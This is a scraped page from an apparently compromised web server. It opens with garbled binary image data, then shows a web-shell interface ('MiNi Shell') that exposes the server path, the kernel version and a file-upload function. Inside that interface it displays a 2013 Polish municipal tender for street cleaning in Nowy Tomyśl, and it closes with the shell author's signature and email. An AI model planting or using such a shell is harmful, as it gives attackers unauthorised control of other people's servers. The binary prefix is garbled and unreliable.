JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131011/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131011/415146-N-2013.html

<p class="kh_header"><b>Nowy Tomyśl: Utrzymanie czystości na terenie miasta Nowy     Tomyśl - dwa Rejony</b><br>
<b>Numer ogłoszenia: 415146 - 2013; data zamieszczenia: 11.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Poznańska 33, 64-300 Nowy Tomyśl, woj. wielkopolskie, tel. 061 4426600, 4426641, faks 061 4422754.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowytomysl.pl - BIP - przetargi - ogłoszenia o przetargach - SPE 2413A - 2413B</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości na terenie miasta Nowy     Tomyśl - dwa Rejony.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2. Przedmiot zamówienia obejmuje:
2.1.  Utrzymanie czystości na terenie miasta Nowy Tomyśl zgodnie z załączonymi specyfikacjami technicznymi 
I. REJON I - Obręb miasta
    Ogólna powierzchnia terenów ulic i chodników wynosi  249.574 m2 
II. REJON II - Obręb osiedli
      Ogólna powierzchnia terenów ulic i chodników wynosi  - 47.287 m2
      Ogólna powierzchnia terenów zielonych wynosi - 16.977 m2.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.51.32.00-8, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2, 77.31.00.00-6, 77.31.20.00-0, 77.31.41.00-5, 77.34.20.00-9, 90.51.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości  10.000,00 zł (słownie złotych: dziesięćtysięcy złotych)  najpóźniej do dnia 19.11.2013r. godz. 9.00.
2.  Wykonawca może wnieść wadium w jednej z następujących przewidzianych w art. 45 ust. 6 ustawy, tj.:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Z 2007; Nr 42, poz. 275).
3.  Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.  Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:
      Bank : PKO BP S.A. Nowy Tomyśl - Nr konta 02 1020 4144 0000 6602 0068 0454        
      Urząd Miejski Nowy Tomyśl (potwierdzenie wpłaty wadium musi być na koncie Urzędu 
      najpóźniej w dniu przetargu do godz. 9.00) z dopiskiem  Wadium - utrzymanie 
      czystości na terenie miasta Nowy Tomyśl.
5.  W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.  W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego : Urząd Miejski w Nowym Tomyślu  pok. 15 lub dołączyć do oferty za załącznikiem nr 1.
7.  Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.
8.  Zamawiający dokona zwrotu wadium zgodnie z art. 46 ust. 1, 1a i 2 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolity : Dz.U. z 2013r.; poz. 907 
z późniejszymi zmianami),
9.  Oferent, którego oferta zostanie wybrana, traci wadium na rzecz Zamawiającego jeżeli 
      odmówi podpisania umowy albo naruszy którykolwiek inny z wymogów, o których
 mowa w art. 46 ust. 5 w/w ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę, jeżeli :
                    - przedstawi, że wykonał w ciągu ostatnich 3 lat przed dniem wszczęciem
                     postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności 
                     jest krótszy - w tym okresie, roboty polegające na utrzymaniu bieżącej 
                     czystości na terenie miasta lub osiedla (z podaniem min. jednej wartości, 
                    daty wykonania, zakresu oraz inwestora i referencji) (Zał. nr 5 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę, jeżeli :
                      będzie dysponował odpowiednim potencjałem technicznym; tj. dysponują  
                      niezbędnymi do wykonania zamówienia narzędziami i urządzeniami, takimi jak:
                      
                     Rejon I :
                      1. Pojazdy przystosowane do sprzątania ulic - min. jedna duża zamiatarka
                          mechaniczna.
                      2. Pojazdy przystosowane do sprzątania chodników - min. jedna mała 
                          zamiatarka mechaniczna.
                      3. Pojazdy przystosowane do przewozu odpadów - min. jeden ciągnik 
                          z przyczepą lub samochód. 
                      4. Pojazd do zimowego utrzymania porządku ulic, placów, parkingów 
                          i chodników - min. dwa pługi ciągnikowe i dwie piaskarki.
                      
                     Rejon II :
                      1. Pojazdy przystosowane do sprzątania ulic i chodników - min. jedna 
                          zamiatarka mechaniczna.
                      2. Pojazdy przystosowane do przewozu odpadów - min. jeden ciągnik 
                          z przyczepą lub samochód. 
                      3. Pojazd do zimowego utrzymania porządku ulic, placów, parkingów 
                          i chodników - min. dwa pługi ciągnikowe i dwie piaskarki.
                      4. Urządzenia do pielęgnacji zieleni - min. jedna kosiarka ciągnikowa,  
                          spalinowe nożyce i kosy mechaniczne.
                          Wszystkie ww. pojazdy (wyszczególnione w załączniku nr 6) muszą być 
                          w dyspozycji Wykonawcy, winny być trwale i czytelnie oznakowane (nazwa  
                          firmy, dane adresowe i numery telefonu), winny być zarejestrowane, 
                          dopuszczone do ruchu, posiadać aktualne badania techniczne i świadectwa 
                          dopuszczenia do ruchu. 
                   
                    Dla obu Rejonów : 
                      5. Dysponowania bazą magazynowo-transportową usytuowaną na terenie gminy  
                          Nowy Tomyśl w odległości nie większej niż 10 km od granic miasta Nowy  
                          Tomyśl 
                      6. Dysponowania na terenie bazy magazynowo - transportowej urządzeniami 
                          do czasowego gromadzenia odpadów komunalnych (wyjętych z koszy  
                          ulicznych i zebranych z ulic) przed transportem do miejsc przetwarzania,
                       7. Wyposażenie bazy magazynowo-transportowej 
                         a) teren bazy magazynowo - transportowej był zabezpieczony w sposób
         uniemożliwiający wstęp osobom nieupoważnionym,
                         b) miejsca przeznaczone do parkowania pojazdów były zabezpieczone przed 
         emisją zanieczyszczeń do gruntu,
                         c) miejsca magazynowania zebranych odpadów komunalnych były     
                             zabezpieczone przed działaniem czynników atmosferycznych,
                        d) miejsca przeznaczone do parkowania pojazdów,
                        e) pomieszczenia socjalne dla pracowników odpowiadające ilości  
                            zatrudnionych osób.

                                  Wykonawca może polegać na potencjale technicznym innych  
                    podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków.  
                    Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, 
                    iż będzie dysponować zasobami niezbędnymi do realizacji zamówienia, 
                    w szczególności przedstawiając w tym celu pisemne zobowiązanie tych   
                    podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres  
                    korzystania z nich przy wykonywaniu zamówienia oraz w przypadku zbierania 
                    padliny na podstawie złożonego oświadczenia.
                 
                                Wykonawcy, którzy nie wykażą spełnienia warunków udziału 
                    w postępowaniu, podlegać będą wykluczeniu z udziału w postępowaniu. 
                    Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
                           Ocena spełniania wyżej opisanych warunków udziału w postępowaniu 
                    dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym    
                    postępowaniu dokumenty oraz oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę, jeżeli :
        - posiada środki finansowe lub zdolność kredytową w banku lub spółdzielczej
                            kasie oszczędnościowo - kredytowej, w których wykonawca posiada  
                            rachunek w wysokości min. 70.000,00 zł (słownie : siedemdziesiąttysięcy 
                            złotych). 
          Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić   
          dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych  
          przez Zamawiającego, może przedstawić inny dokument, który w  
          wystarczający sposób potwierdza spełnienie opisanego przez Zamawiające -        
          go warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>


<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nowytomysl.pl - BIP - przetargi - ogłoszenia o przetargach - SPE 2413A do SPE 2413B<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski;  ul. Poznańska 33;  64-300  Nowy Tomyśl;  pok. nr 15..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.11.2013 godzina 09:00, miejsce: Urząd Miejski;  ul. Poznańska 33;  64-300  Nowy Tomyśl;  pok. nr 28 - sekretariat Urzędu Miejskiego..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rejon I - Obręb miasta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ogólna powierzchnia terenów ulic i chodników wynosi  249.574 m2
Sprzątanie miasta w następujących okresach : wiosennym, letnim, jesienno-zimowym 
oraz zimowym.
a) utrzymanie w czystości ulic, placów, chodników, przystanków autobusowych i parkingów   
     oraz trawników,
b) odśnieżanie i posypywanie piaskiem chodników, parkingów i placów,
c) opróżnianie koszy ulicznych i pojemników na psie odchody oraz ich czyszczenie,
d) sprzątnie terenu po imprezach masowych niezależnie od czasu ich organizacji,
e) usuwanie martwych zwierząt, padłych w wyniku kolizji drogowych z terenu miasta i gminy  
    Nowy Tomyśl.
f) utrzymanie w czystości słupów ogłoszeniowych,
g) sprzątanie terenu przy pomnikach i tablicach pamiątkowych,
h) mycie znaków drogowych (usuwanie graffiti na przystankach) 
i) malowanie barierek i łańcuchów ochronnych
j) naprawa zapadniętych chodników na terenie obsługiwanym.
h) koszenie trawy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.51.32.00-8, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Lokalizacja bazy magazynowo - transportowej - 20</li>
<li>3. Posiadany sprzęt - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rejon II - Obręb osiedli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ogólna powierzchnia terenów ulic i chodników wynosi  - 47.287 m2
Ogólna powierzchnia terenów zielonych wynosi - 16.977 m2 
Sprzątanie osiedli w następujących okresach : wiosennym, letnim, jesienno-zimowym 
    oraz zimowym.
a) utrzymanie w czystości ulic, placów, chodników, przystanków autobusowych i parkingów  
    oraz trawników,
b) odśnieżanie i posypywanie piaskiem chodników, parkingów i placów,
c) opróżnianie koszy ulicznych i pojemników na psie odchody oraz ich czyszczenie,
d) sprzątnie terenu po imprezach masowych niezależnie od czasu ich organizacji,
e) usuwanie martwych zwierząt, padłych w wyniku kolizji drogowych z terenu osiedli       
    Nowego Tomyśla.
f) utrzymanie w czystości słupów ogłoszeniowych,
g) mycie znaków drogowych (usuwanie graffiti na przystankach) 
h) malowanie barierek i łańcuchów ochronnych
i) naprawa zapadniętych chodników na terenie obsługiwanym.
j) koszenie trawy
2.Pielęgnacja ciągów zieleni miejskiej w okresie wiosenno-letnim od 1 kwietnia 
   do 30 września..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.51.32.00-8, 90.61.00.00-6, 90.62.00.00-9, 77.31.00.00-6, 77.31.20.00-0, 77.31.41.00-5, 77.34.20.00-9, 90.51.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Lokalizacja bazy magazynowo - transportowej - 20</li>
<li>3. Posiadany sprzęt - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com